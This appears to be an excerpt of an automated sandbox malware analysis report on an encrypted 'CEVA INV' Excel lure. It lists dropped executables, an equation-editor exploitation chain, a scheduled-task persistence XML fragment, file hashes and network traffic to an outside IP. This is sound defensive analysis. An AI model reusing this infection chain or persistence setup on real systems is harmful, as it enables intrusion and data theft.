                                                          Entropy (8bit):1.0723286533222698
                                                          Encrypted:false
                                                          SSDEEP:6144:5FPAuIU4U9tVvfJHGCOd7FPAuIU4U9tVvfJHGCOd2:5mIvhGJd7mIvhGJd2
                                                          MD5:6CFA3170A68147326768DE26F5E88F3C
                                                          SHA1:5ABCF9E540CFE7E9F1BB50F43FB139722402D141
                                                          SHA-256:5EC13FDB116FAD2A722159AC55F98A857E0925759BCAEB75AC83FCCBF7C3E8C2
                                                          SHA-512:5796C7D980E914485DD390F5EE14196EE89CCD7F6F237D4CA7AA88EC9158196E85FD7D5AC2990D9BA3DCCC55F63A8598F47B13020331F54134E931EF018C2A8B
                                                          Malicious:false
                                                          Preview: ....l................................H.. EMF......0.....................V...........................fZ..U"..F...ti..hi..GDIC........z.@m....Pi.........4.....4...........................................4..A. ...................(....................h................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                          C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\D6B60ECD.jpeg
                                                          Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                          File Type:[TIFF image data, big-endian, direntries=4], baseline, precision 8, 396x275, frames 3
                                                          Category:dropped
                                                          Size (bytes):24075
                                                          Entropy (8bit):6.730214296651396
                                                          Encrypted:false
                                                          SSDEEP:384:oKr6BE4bXWRwgWHxVQ9T31pQO9v8IgLvt:oKcElRwfQ9T3cWiB
                                                          MD5:09AFF1FCE05F6A872A9F9A75B7C645F5
                                                          SHA1:5E8004FDCA739142B1AB20AD6BF773DE8C7B32FD
                                                          SHA-256:00B28A518ACB867ABB2F0447DCEB07BD6E47005A1C608ACCF49A4EA3D96112F8
                                                          SHA-512:355D944292FDCEC869EE28098B6CDF155EE7E697B3651F40538C34B68086DB370FF1D2B6C7306D71E4203734C73796EC6C9EE0C1F539E4F8F653575EE0FD66D9
                                                          Malicious:false
                                                          Preview: ......JFIF.....x.x......Exif..MM.*.......;.........J.i.........T.......................>................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                          C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\DAA062B0.jpeg
                                                          Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                          File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 191x263, frames 3
                                                          Category:dropped
                                                          Size (bytes):8815
                                                          Entropy (8bit):7.944898651451431
                                                          Encrypted:false
                                                          SSDEEP:192:Qjnr2Il8e7li2YRD5x5dlyuaQ0ugZIBn+0O2yHQGYtPto:QZl8e7li2YdRyuZ0b+JGgtPW
                                                          MD5:F06432656347B7042C803FE58F4043E1
                                                          SHA1:4BD52B10B24EADECA4B227969170C1D06626A639
                                                          SHA-256:409F06FC20F252C724072A88626CB29F299167EAE6655D81DF8E9084E62D6CF6
                                                          SHA-512:358FEB8CBFFBE6329F31959F0F03C079CF95B494D3C76CF3669D28CA8CDB42B04307AE46CED1FC0605DEF31D9839A0283B43AA5D409ADC283A1CAD787BE95F0E
                                                          Malicious:false
                                                          Preview: ......JFIF...................................................) ..(...!1!%)-.....383,7(..,...........+...7++++-+++++++++++++++---++++++++-+++++++++++++++++...........".......................................F........................!."1A..QRa.#2BSq......3b.....$c....C...Er.5.........................................................?..x.5.PM.Q@E..I......i..0.$G.C...h..Gt....f..O..U..D.t^...u.B...V9.f..<..t(.kt...d.@...&3)d@@?.q...t..3!.... .9.r.....Q.(:.W..X&..&.1&T.*.K..|kc.....[..l.3(f+.c...:+....5....hHR.0....^R.G..6...&pB..d.h.04.*+..S...M........[....'......J...,...<.O.........Yn...T.!..E*G.[I..-.......$e&........z..[..3.+~..a.u9d.&9K.xkX'.."...Y...l.......MxPu..b..:0e:.R.#.......U....E...4Pd/..0.`.4 ...A...t.....2....gb[)b.I."&..y1..........l.s>.ZA?..........3... z^....L.n6..Am.1m....0../..~.y......1.b.0U...5.oi.\.LH1.f....sl................f.'3?...bu.P4>...+..B....eL....R.,...<....3.0O$,=..K.!....Z.......O.I.z....am....C.k..iZ ...<ds....f8f..R....K
                                                          C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\E3296E6A.png
                                                          Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                          File Type:PNG image data, 1686 x 725, 8-bit/color RGBA, non-interlaced
                                                          Category:dropped
                                                          Size (bytes):79394
                                                          Entropy (8bit):7.864111100215953
                                                          Encrypted:false
                                                          SSDEEP:1536:ACLfq2zNFewyOGGG0QZ+6G0GGGLvjpP7OGGGeLEnf85dUGkm6COLZgf3BNUdQ:7PzbewyOGGGv+6G0GGG7jpP7OGGGeLEe
                                                          MD5:16925690E9B366EA60B610F517789AF1
                                                          SHA1:9F3FE15AE44644F9ED8C2CA668B7020DF726426B
                                                          SHA-256:C3D7308B11E8C1EFD9C0A7F6EC370A13EC2C87123811865ED372435784579C1F
                                                          SHA-512:AEF16EA5F33602233D60F6B6861980488FD252F14DCAE10A9A328338A6890B081D59DCBD9F5B68E93D394DEF2E71AD06937CE2711290E7DD410451A3B1E54CDD
                                                          Malicious:false
                                                          Preview: .PNG........IHDR................J....sRGB.........gAMA......a.....pHYs...t...t..f.x....IDATx^....~.y.....K...E...):.#.Ik..$o.....a.-[..S..M*A..Bc..i+..e...u["R.., (.b...IT.0X.}...(..@...F>...v....s.g.....x.>...9s..q]s......w...^z...........?........9D.}.w}W..RK..........S..y....S.y....S.J_..qr.....I}|.._...>r.v~..G.*.)..#.>z._....|.#..fF..?.G......zO.C.......zO.%......'....S..y....S.y....S.J_..qr.....I}|.._...>r.v~..G.*.)..#.>z....._.W.~....S.......c..zO.C..N.vO.%............S..y....S.y....S.J_..qr.....I}|.._...>r.v~..G.*.)..#.>z..&nf..?........zO.C...o...{J-......._..S..y....S.y....S.J_..qr.....I}|.._...>r.v~..G.*.)..#.>z...6..........J..:.......SjI..=...}.zO.#.%.vO.+...vO.+}.R...6.f.'..m.~m.~..=..5C.....4[....%uw........M.r..M.k.:N.q4[<..o..k...G......XE=..b$.G.,..K...H'._nj..kJ_..qr.....I}|.._...>r.v~..G.*.)..#.>......R...._..j.G...Y.>..!......O..{....L.}S..|.=}.>..OU...m.ks/....x..l....X.]e......?.........$...F.........>..{.Qb......
                                                          C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\EA55EE58.jpeg
                                                          Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                          File Type:[TIFF image data, big-endian, direntries=4], baseline, precision 8, 396x275, frames 3
                                                          Category:dropped
                                                          Size (bytes):24075
                                                          Entropy (8bit):6.730214296651396
                                                          Encrypted:false
                                                          SSDEEP:384:oKr6BE4bXWRwgWHxVQ9T31pQO9v8IgLvt:oKcElRwfQ9T3cWiB
                                                          MD5:09AFF1FCE05F6A872A9F9A75B7C645F5
                                                          SHA1:5E8004FDCA739142B1AB20AD6BF773DE8C7B32FD
                                                          SHA-256:00B28A518ACB867ABB2F0447DCEB07BD6E47005A1C608ACCF49A4EA3D96112F8
                                                          SHA-512:355D944292FDCEC869EE28098B6CDF155EE7E697B3651F40538C34B68086DB370FF1D2B6C7306D71E4203734C73796EC6C9EE0C1F539E4F8F653575EE0FD66D9
                                                          Malicious:false
                                                          Preview: ......JFIF.....x.x......Exif..MM.*.......;.........J.i.........T.......................>................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                          C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\EB61327.png
                                                          Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                          File Type:PNG image data, 566 x 429, 8-bit/color RGBA, non-interlaced
                                                          Category:dropped
                                                          Size (bytes):84203
                                                          Entropy (8bit):7.979766688932294
                                                          Encrypted:false
                                                          SSDEEP:1536:RrpoeM3WUHO25A8HD3So4lL9jvtO63O2l/Wr9nuQvs+9QvM4PmgZuVHdJ5v3ZK7+:H5YHOhwx4lRTtO6349uQvXJ4PmgZu11J
                                                          MD5:208FD40D2F72D9AED77A86A44782E9E2
                                                          SHA1:216B99E777ED782BDC3BFD1075DB90DFDDABD20F
                                                          SHA-256:CBFDB963E074C150190C93796163F3889165BF4471CA77C39E756CF3F6F703FF
                                                          SHA-512:7BCE80FFA8B0707E4598639023876286B6371AE465A9365FA21D2C01405AB090517C448514880713CA22875013074DB9D5ED8DA93C223F265C179CFADA609A64
                                                          Malicious:false
                                                          Preview: .PNG........IHDR...6...........>(....sRGB.........gAMA......a.....pHYs..........+......IDATx^.=v\9..H..f...:ZA..,'..j.r4.........SEJ,%..VPG..K.=....@.$oI.e7....U...... ....>n~&..._..._.rg....L...D.G!0..G!;...?...Oo.7....Cc...G....g>......_o..._._.}q...k.....ru..T.....S.!....~..@Y96.S.....&..1.:....o...q.6..S...'n..H.hS......y;.N.l.)."[ `.f.X.u.n.;........._h.(.u|0a.....].R.z...2......GJY|\..+b...{>vU.....i...........w+.p...X..._.V.-z..s..U..cR..g^..X......6n...6....O6.-.AM.f.=y ...7...;X....q..|...=.|K...w...}O..{|...G........~.o3.....z....m6...sN.0..;/....Y..H..o............~........(W.`...S.t......m....+.K...<..M=...IN.U..C..].5.=...s..g.d..f.<Km..$..fS...o..:..}@...;k..m.L./.$......,}....3%..|j.....b.r7.O!F...c'......$...)....|O.CK...._......Nv....q.t3l.,. ....vD.-..o..k.w.....X...-C..KGld.8.a}|..,.....,....q.=r..Pf.V#.....n...}........[w...N.b..W......;..?.Oq..K{>.K.....{w{.......6'/...,.}.E...X.I.-Y].JJm.j..pq|.0...e.v......17...:F
                                                          C:\Users\user\AppData\Local\Temp\Excel8.0\MSForms.exd
                                                          Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):241332
                                                          Entropy (8bit):4.206799394485336
                                                          Encrypted:false
                                                          SSDEEP:1536:cGxLEQNSk8SCtKBX0Gpb2vxKHnVMOkOX0mRO/NIAIQK7viKAJYsA0ppDCLTfMRsi:cQNNSk8DtKBrpb2vxrOpprf/nVq
                                                          MD5:61C1A28D8DFA8AD6D0972823C013568D
                                                          SHA1:E54C18B1ED224D94A0018B039684A9EA081DBD91
                                                          SHA-256:1E8D51AEC5450C96509DEC0394F473BE0B1A7442B8132E3C864D64AEA8151237
                                                          SHA-512:1A94FB4F918F4B77DC513ED4138F3DDF342AB8766AA4319EE3A586112C66BBCCFCAB11536F9E33D8C7195487BA29EC57C1E3967BB6FD534B150E4E132412B5E8
                                                          Malicious:false
                                                          Preview: MSFT................Q................................$......$....... ...................d.......,...........X....... ...........L...........x.......@...........l.......4...........`.......(...........T...................H...........t.......<...........h.......0...........\.......$...........P...........|.......D...........p.......8...........d.......,...........X....... ...........L...........x.......@........ ..l ... ..4!...!...!..`"..."..(#...#...#..T$...$...%...%...%..H&...&...'..t'...'..<(...(...)..h)...)..0*...*...*..\+...+..$,...,...,..P-...-......|.......D/.../...0..p0...0..81...1...2..d2...2..,3...3...3..X4...4.. 5...5...5..L6...6...7..x7...7..@8.......8..............................H...4............................................................................x...I..............T............ ..P........................... ...........................................................&!..............................................................................................
                                                          C:\Users\user\AppData\Local\Temp\tmp2720.tmp
                                                          Process:C:\Users\Public\vbc.exe
                                                          File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                          Category:dropped
                                                          Size (bytes):1621
                                                          Entropy (8bit):5.142576854240234
                                                          Encrypted:false
                                                          SSDEEP:24:2dH4+SEqCZ7ClNMFi/rlMhEMjnGpwjpIgUYODOLD9RJh7h8gKBEtn:cbhZ7ClNQi/rydbz9I3YODOLNdq3o
                                                          MD5:4D474995C554718DFBC52E008342BB25
                                                          SHA1:81201E86AE8C1E271015593C11132CE6DC4CC602
                                                          SHA-256:BCAC1EF2C39F4D17E9325D7553E6889AA83A52F5D476A8C22B2823C1D4D2932B
                                                          SHA-512:75B76D90FD968A39BD0A9F21E0F4C6CE004F55C5915BA5BF9A9BA3279C87AA0A8E606EBBD8054CE5E76601773294075A909F4D309D1C27C66AE6575EDC44325F
                                                          Malicious:true
                                                          Preview: <?xml version="1.0" encoding="UTF-16"?>..<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">.. <RegistrationInfo>.. <Date>2014-10-25T14:27:44.8929027</Date>.. <Author>user-PC\user</Author>.. </RegistrationInfo>.. <Triggers>.. <LogonTrigger>.. <Enabled>true</Enabled>.. <UserId>user-PC\user</UserId>.. </LogonTrigger>.. <RegistrationTrigger>.. <Enabled>false</Enabled>.. </RegistrationTrigger>.. </Triggers>.. <Principals>.. <Principal id="Author">.. <UserId>user-PC\user</UserId>.. <LogonType>InteractiveToken</LogonType>.. <RunLevel>LeastPrivilege</RunLevel>.. </Principal>.. </Principals>.. <Settings>.. <MultipleInstancesPolicy>StopExisting</MultipleInstancesPolicy>.. <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>.. <StopIfGoingOnBatteries>true</StopIfGoingOnBatteries>.. <AllowHardTerminate>false</AllowHardTerminate>.. <StartWhenAvailable>true</StartWhenAvailable>
                                                          C:\Users\user\AppData\Roaming\EA860E7A-A87F-4A88-92EF-38F744458171\run.dat
                                                          Process:C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe
                                                          File Type:ISO-8859 text, with no line terminators
                                                          Category:dropped
                                                          Size (bytes):8
                                                          Entropy (8bit):3.0
                                                          Encrypted:false
                                                          SSDEEP:3:ZQt:ZQt
                                                          MD5:E829F44A04930C7C533538BB54E1B895
                                                          SHA1:5E1258B6E344A4C819910875152DE566B84DDB77
                                                          SHA-256:2D2583CF5175C659B83839F994E77A789E4309420DABBCFD9AD7C1F40BBAEB00
                                                          SHA-512:A712E891465656E7068152ECA2560C4E3C34E46249510F509186AD31DE7F4D2AF8EC3A730F2116E65FF35C8D9183342C25C23A76AB7CE5D8614217E4B3B19D4C
                                                          Malicious:true
                                                          Preview: RP.....H
                                                          C:\Users\user\AppData\Roaming\gmSlQSien.exe
                                                          Process:C:\Users\Public\vbc.exe
                                                          File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                          Category:dropped
                                                          Size (bytes):802304
                                                          Entropy (8bit):7.807064216316379
                                                          Encrypted:false
                                                          SSDEEP:12288:fqPhNb1Cpc0vs3YpRTYmuCBWhfCfyxmbKzYwafnJMKrXe3tw2luRVZzQKaq:iPhxcpHUIpRTY0c1uyUeU3nJMKoCaq
                                                          MD5:A3CBEB3E732B11954572B3EE6755242C
                                                          SHA1:EBB41B49DE8F1B09EA20DABFFCFD85B93B68D7F3
                                                          SHA-256:E006460AD1E34DDBBC28430C2D529A7EE491893C7AE8B6902B2D8D8C56620510
                                                          SHA-512:455C3CAE5F85B8F3334004E09C5EF42BB6E8410F7501AEF0D520E1023EB376E31D6FA892DAB8DC8AAEA94914F31EC7915E8424362F1046F25F9B55C58EF94BD6
                                                          Malicious:true
                                                          Antivirus:
                                                          • Antivirus: Joe Sandbox ML, Detection: 100%
                                                          Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....s`..............P..2...........P... ...`....@.. ....................................@.................................@P..O....`............................................................................... ............... ..H............text....0... ...2.................. ..`.rsrc........`.......4..............@..@.reloc...............<..............@..B................tP......H........}..du...............]...........................................0............(....(..........(.....o ....*.....................(!......("......(#......($......(%....*N..(....o....(&....*&..('....*.s(........s)........s*........s+........s,........*....0...........~....o-....+..*.0...........~....o.....+..*.0...........~....o/....+..*.0...........~....o0....+..*.0...........~....o1....+..*.0..<........~.....(2.....,!r...p.....(3...o4...s5............~.....+..*.0......
                                                          C:\Users\user\Desktop\~$SOL2021-03-14-NETC-NI-21-049-CEVA INV.xlsx
                                                          Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):330
                                                          Entropy (8bit):1.4377382811115937
                                                          Encrypted:false
                                                          SSDEEP:3:vZ/FFDJw2fj/FFDJw2fV:vBFFGaFFGS
                                                          MD5:96114D75E30EBD26B572C1FC83D1D02E
                                                          SHA1:A44EEBDA5EB09862AC46346227F06F8CFAF19407
                                                          SHA-256:0C6F8CF0E504C17073E4C614C8A7063F194E335D840611EEFA9E29C7CED1A523
                                                          SHA-512:52D33C36DF2A91E63A9B1949FDC5D69E6A3610CD3855A2E3FC25017BF0A12717FC15EB8AC6113DC7D69C06AD4A83FAF0F021AD7C8D30600AA8168348BD0FA9E0
                                                          Malicious:true
                                                          Preview: .user ..A.l.b.u.s. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . ..user ..A.l.b.u.s. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
                                                          C:\Users\Public\vbc.exe
                                                          Process:C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
                                                          File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                          Category:dropped
                                                          Size (bytes):802304
                                                          Entropy (8bit):7.807064216316379
                                                          Encrypted:false
                                                          SSDEEP:12288:fqPhNb1Cpc0vs3YpRTYmuCBWhfCfyxmbKzYwafnJMKrXe3tw2luRVZzQKaq:iPhxcpHUIpRTY0c1uyUeU3nJMKoCaq
                                                          MD5:A3CBEB3E732B11954572B3EE6755242C
                                                          SHA1:EBB41B49DE8F1B09EA20DABFFCFD85B93B68D7F3
                                                          SHA-256:E006460AD1E34DDBBC28430C2D529A7EE491893C7AE8B6902B2D8D8C56620510
                                                          SHA-512:455C3CAE5F85B8F3334004E09C5EF42BB6E8410F7501AEF0D520E1023EB376E31D6FA892DAB8DC8AAEA94914F31EC7915E8424362F1046F25F9B55C58EF94BD6
                                                          Malicious:true
                                                          Antivirus:
                                                          • Antivirus: Joe Sandbox ML, Detection: 100%
                                                          Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....s`..............P..2...........P... ...`....@.. ....................................@.................................@P..O....`............................................................................... ............... ..H............text....0... ...2.................. ..`.rsrc........`.......4..............@..@.reloc...............<..............@..B................tP......H........}..du...............]...........................................0............(....(..........(.....o ....*.....................(!......("......(#......($......(%....*N..(....o....(&....*&..('....*.s(........s)........s*........s+........s,........*....0...........~....o-....+..*.0...........~....o.....+..*.0...........~....o/....+..*.0...........~....o0....+..*.0...........~....o1....+..*.0..<........~.....(2.....,!r...p.....(3...o4...s5............~.....+..*.0......

                                                          Static File Info

                                                          General

                                                          File type:CDFV2 Encrypted
                                                          Entropy (8bit):7.996512042903542
                                                          TrID:
                                                          • Generic OLE2 / Multistream Compound File (8008/1) 100.00%
                                                          File name:SOL2021-03-14-NETC-NI-21-049-CEVA INV.xlsx
                                                          File size:2355200
                                                          MD5:216f2652001700d1f7ac1109a508ce2d
                                                          SHA1:82d3a0b7bb096d03f9f1a4de5444c216849d576b
                                                          SHA256:9b393f90c5fa6aabf671d0f80a9ee0e4f44330cd3ee14dc0d9066f978d9435ff
                                                          SHA512:e854221d2c4992565e49577f3d31753916088fa6c022f23d956e68d1964b15fc95095d35cc7f016e3decf8773fb184b9fb15aa4bdfa9b136b0284c1291a7a6dc
                                                          SSDEEP:49152:RgiTzvPAADDhb9t8qo8hcgu9iMi7SFIMYb9QRm13KFQtwLK:R9vPAAXhZaZX9iv7C1oQQcqwO
                                                          File Content Preview:........................>...................$....................................................................................................................................... ...!..."...#...$...~...............z......................................

                                                          File Icon

                                                          Icon Hash:e4e2aa8aa4b4bcb4

                                                          Static OLE Info

                                                          General

                                                          Document Type:OLE
                                                          Number of OLE Files:1

                                                          OLE File "SOL2021-03-14-NETC-NI-21-049-CEVA INV.xlsx"

                                                          Indicators

                                                          Has Summary Info:False
                                                          Application Name:unknown
                                                          Encrypted Document:True
                                                          Contains Word Document Stream:False
                                                          Contains Workbook/Book Stream:False
                                                          Contains PowerPoint Document Stream:False
                                                          Contains Visio Document Stream:False
                                                          Contains ObjectPool Stream:
                                                          Flash Objects Count:
                                                          Contains VBA Macros:False

                                                          Streams

                                                          Stream Path: \x6DataSpaces/DataSpaceInfo/StrongEncryptionDataSpace, File Type: data, Stream Size: 64
                                                          General
                                                          Stream Path:\x6DataSpaces/DataSpaceInfo/StrongEncryptionDataSpace
                                                          File Type:data
                                                          Stream Size:64
                                                          Entropy:2.73637206947
                                                          Base64 Encoded:False
                                                          Data ASCII:. . . . . . . . 2 . . . S . t . r . o . n . g . E . n . c . r . y . p . t . i . o . n . T . r . a . n . s . f . o . r . m . . .
                                                          Data Raw:08 00 00 00 01 00 00 00 32 00 00 00 53 00 74 00 72 00 6f 00 6e 00 67 00 45 00 6e 00 63 00 72 00 79 00 70 00 74 00 69 00 6f 00 6e 00 54 00 72 00 61 00 6e 00 73 00 66 00 6f 00 72 00 6d 00 00 00
                                                          Stream Path: \x6DataSpaces/DataSpaceMap, File Type: data, Stream Size: 112
                                                          General
                                                          Stream Path:\x6DataSpaces/DataSpaceMap
                                                          File Type:data
                                                          Stream Size:112
                                                          Entropy:2.7597816111
                                                          Base64 Encoded:False
                                                          Data ASCII:. . . . . . . . h . . . . . . . . . . . . . . E . n . c . r . y . p . t . e . d . P . a . c . k . a . g . e . 2 . . . S . t . r . o . n . g . E . n . c . r . y . p . t . i . o . n . D . a . t . a . S . p . a . c . e . . .
                                                          Data Raw:08 00 00 00 01 00 00 00 68 00 00 00 01 00 00 00 00 00 00 00 20 00 00 00 45 00 6e 00 63 00 72 00 79 00 70 00 74 00 65 00 64 00 50 00 61 00 63 00 6b 00 61 00 67 00 65 00 32 00 00 00 53 00 74 00 72 00 6f 00 6e 00 67 00 45 00 6e 00 63 00 72 00 79 00 70 00 74 00 69 00 6f 00 6e 00 44 00 61 00 74 00 61 00 53 00 70 00 61 00 63 00 65 00 00 00
                                                          Stream Path: \x6DataSpaces/TransformInfo/StrongEncryptionTransform/\x6Primary, File Type: data, Stream Size: 200
                                                          General
                                                          Stream Path:\x6DataSpaces/TransformInfo/StrongEncryptionTransform/\x6Primary
                                                          File Type:data
                                                          Stream Size:200
                                                          Entropy:3.13335930328
                                                          Base64 Encoded:False
                                                          Data ASCII:X . . . . . . . L . . . { . F . F . 9 . A . 3 . F . 0 . 3 . - . 5 . 6 . E . F . - . 4 . 6 . 1 . 3 . - . B . D . D . 5 . - . 5 . A . 4 . 1 . C . 1 . D . 0 . 7 . 2 . 4 . 6 . } . N . . . M . i . c . r . o . s . o . f . t . . . C . o . n . t . a . i . n . e . r . . . E . n . c . r . y . p . t . i . o . n . T . r . a . n . s . f . o . r . m . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
                                                          Data Raw:58 00 00 00 01 00 00 00 4c 00 00 00 7b 00 46 00 46 00 39 00 41 00 33 00 46 00 30 00 33 00 2d 00 35 00 36 00 45 00 46 00 2d 00 34 00 36 00 31 00 33 00 2d 00 42 00 44 00 44 00 35 00 2d 00 35 00 41 00 34 00 31 00 43 00 31 00 44 00 30 00 37 00 32 00 34 00 36 00 7d 00 4e 00 00 00 4d 00 69 00 63 00 72 00 6f 00 73 00 6f 00 66 00 74 00 2e 00 43 00 6f 00 6e 00 74 00 61 00 69 00 6e 00 65 00
                                                          Stream Path: \x6DataSpaces/Version, File Type: data, Stream Size: 76
                                                          General
                                                          Stream Path:\x6DataSpaces/Version
                                                          File Type:data
                                                          Stream Size:76
                                                          Entropy:2.79079600998
                                                          Base64 Encoded:False
                                                          Data ASCII:< . . . M . i . c . r . o . s . o . f . t . . . C . o . n . t . a . i . n . e . r . . . D . a . t . a . S . p . a . c . e . s . . . . . . . . . . . . .
                                                          Data Raw:3c 00 00 00 4d 00 69 00 63 00 72 00 6f 00 73 00 6f 00 66 00 74 00 2e 00 43 00 6f 00 6e 00 74 00 61 00 69 00 6e 00 65 00 72 00 2e 00 44 00 61 00 74 00 61 00 53 00 70 00 61 00 63 00 65 00 73 00 01 00 00 00 01 00 00 00 01 00 00 00
                                                          Stream Path: EncryptedPackage, File Type: data, Stream Size: 2333048
                                                          General
                                                          Stream Path:EncryptedPackage
                                                          File Type:data
                                                          Stream Size:2333048
                                                          Entropy:7.9998366813
                                                          Base64 Encoded:True
                                                          Data ASCII:h . # . . . . . . . ? . @ . H . & . . . . 5 . . ) . $ { . . . T = . . . P . | B . K . . . O x f K . . . % . ? . - . } Z . . . T r S V . . . . > . . . . . . . . . . . J . . ? > . . . . . . . . . . . J . . ? > . . . . . . . . . . . J . . ? > . . . . . . . . . . . J . . ? > . . . . . . . . . . . J . . ? > . . . . . . . . . . . J . . ? > . . . . . . . . . . . J . . ? > . . . . . . . . . . . J . . ? > . . . . . . . . . . . J . . ? > . . . . . . . . . . . J . . ? > . . . . . . . . . . . J . . ? > . . . . . . .
                                                          Data Raw:68 99 23 00 00 00 00 00 ef af 3f 88 40 98 48 be 26 85 06 9f ac 35 e5 f7 29 f9 24 7b e7 8e a0 54 3d ef c0 be 50 d2 7c 42 f7 4b d4 07 f6 4f 78 66 4b b4 f3 f4 25 c2 3f 95 2d 16 7d 5a 88 0b 18 54 72 53 56 13 20 0d 1d da 3e 03 90 e4 19 0b 81 19 e7 a4 c8 aa 4a fb 11 3f 3e 03 90 e4 19 0b 81 19 e7 a4 c8 aa 4a fb 11 3f 3e 03 90 e4 19 0b 81 19 e7 a4 c8 aa 4a fb 11 3f 3e 03 90 e4 19 0b 81 19
                                                          Stream Path: EncryptionInfo, File Type: data, Stream Size: 224
                                                          General
                                                          Stream Path:EncryptionInfo
                                                          File Type:data
                                                          Stream Size:224
                                                          Entropy:4.52599239953
                                                          Base64 Encoded:False
                                                          Data ASCII:. . . . $ . . . . . . . $ . . . . . . . . f . . . . . . . . . . . . . . . . . . . . . . M . i . c . r . o . s . o . f . t . . E . n . h . a . n . c . e . d . . R . S . A . . a . n . d . . A . E . S . . C . r . y . p . t . o . g . r . a . p . h . i . c . . P . r . o . v . i . d . e . r . . . . . . . 2 . a . . . D . d . . . . A < ~ . . . . . . . . . . . . . ~ . . . . . . . . K . [ . B . 6 . . . < . . . . : . . . . . . . . 6 9 . . . b
                                                          Data Raw:04 00 02 00 24 00 00 00 8c 00 00 00 24 00 00 00 00 00 00 00 0e 66 00 00 04 80 00 00 80 00 00 00 18 00 00 00 00 00 00 00 00 00 00 00 4d 00 69 00 63 00 72 00 6f 00 73 00 6f 00 66 00 74 00 20 00 45 00 6e 00 68 00 61 00 6e 00 63 00 65 00 64 00 20 00 52 00 53 00 41 00 20 00 61 00 6e 00 64 00 20 00 41 00 45 00 53 00 20 00 43 00 72 00 79 00 70 00 74 00 6f 00 67 00 72 00 61 00 70 00 68 00

                                                          Network Behavior

                                                          Network Port Distribution

                                                          TCP Packets

                                                          TimestampSource PortDest PortSource IPDest IP
                                                          Apr 12, 2021 08:02:43.703808069 CEST4916780192.168.2.2213.235.115.155
                                                          Apr 12, 2021 08:02:43.865977049 CEST804916713.235.115.155192.168.2.22
                                                          Apr 12, 2021 08:02:43.866086006 CEST4916780192.168.2.2213.235.115.155
                                                          Apr 12, 2021 08:02:43.867336988 CEST4916780192.168.2.2213.235.115.155
                                                          Apr 12, 2021 08:02:44.030188084 CEST804916713.235.115.155192.168.2.22
                                                          Apr 12, 2021 08:02:44.030231953 CEST804916713.235.115.155192.168.2.22
                                                          Apr 12, 2021 08:02:44.030258894 CEST804916713.235.115.155192.168.2.22
                                                          Apr 12, 2021 08:02:44.030287027 CEST804916713.235.115.155192.168.2.22
                                                          Apr 12, 2021 08:02:44.030385017 CEST4916780192.168.2.2213.235.115.155
                                                          Apr 12, 2021 08:02:44.030462027 CEST4916780192.168.2.2213.235.115.155
                                                          Apr 12, 2021 08:02:44.195743084 CEST804916713.235.115.155192.168.2.22
                                                          Apr 12, 2021 08:02:44.195807934 CEST804916713.235.115.155192.168.2.22
                                                          Apr 12, 2021 08:02:44.195846081 CEST804916713.235.115.155192.168.2.22
                                                          Apr 12, 2021 08:02:44.195899963 CEST804916713.235.115.155192.168.2.22
                                                          Apr 12, 2021 08:02:44.195945978 CEST804916713.235.115.155192.168.2.22
                                                          Apr 12, 2021 08:02:44.195990086 CEST804916713.235.115.155192.168.2.22
                                                          Apr 12, 2021 08:02:44.195991039 CEST4916780192.168.2.2213.235.115.155
                                                          Apr 12, 2021 08:02:44.196031094 CEST804916713.235.115.155192.168.2.22
                                                          Apr 12, 2021 08:02:44.196053028 CEST4916780192.168.2.2213.235.115.155
                                                          Apr 12, 2021 08:02:44.196073055 CEST804916713.235.115.155192.168.2.22
                                                          Apr 12, 2021 08:02:44.196085930 CEST4916780192.168.2.2213.235.115.155
                                                          Apr 12, 2021 08:02:44.196120024 CEST4916780192.168.2.2213.235.115.155
                                                          Apr 12, 2021 08:02:44.358494997 CEST804916713.235.115.155192.168.2.22
                                                          Apr 12, 2021 08:02:44.358552933 CEST804916713.235.115.155192.168.2.22
                                                          Apr 12, 2021 08:02:44.358603954 CEST804916713.235.115.155192.168.2.22
                                                          Apr 12, 2021 08:02:44.358632088 CEST4916780192.168.2.2213.235.115.155
                                                          Apr 12, 2021 08:02:44.358642101 CEST804916713.235.115.155192.168.2.22
                                                          Apr 12, 2021 08:02:44.358683109 CEST804916713.235.115.155192.168.2.22
                                                          Apr 12, 2021 08:02:44.358721018 CEST804916713.235.115.155192.168.2.22
                                                          Apr 12, 2021 08:02:44.358727932 CEST4916780192.168.2.2213.235.115.155
                                                          Apr 12, 2021 08:02:44.358745098 CEST4916780192.168.2.2213.235.115.155
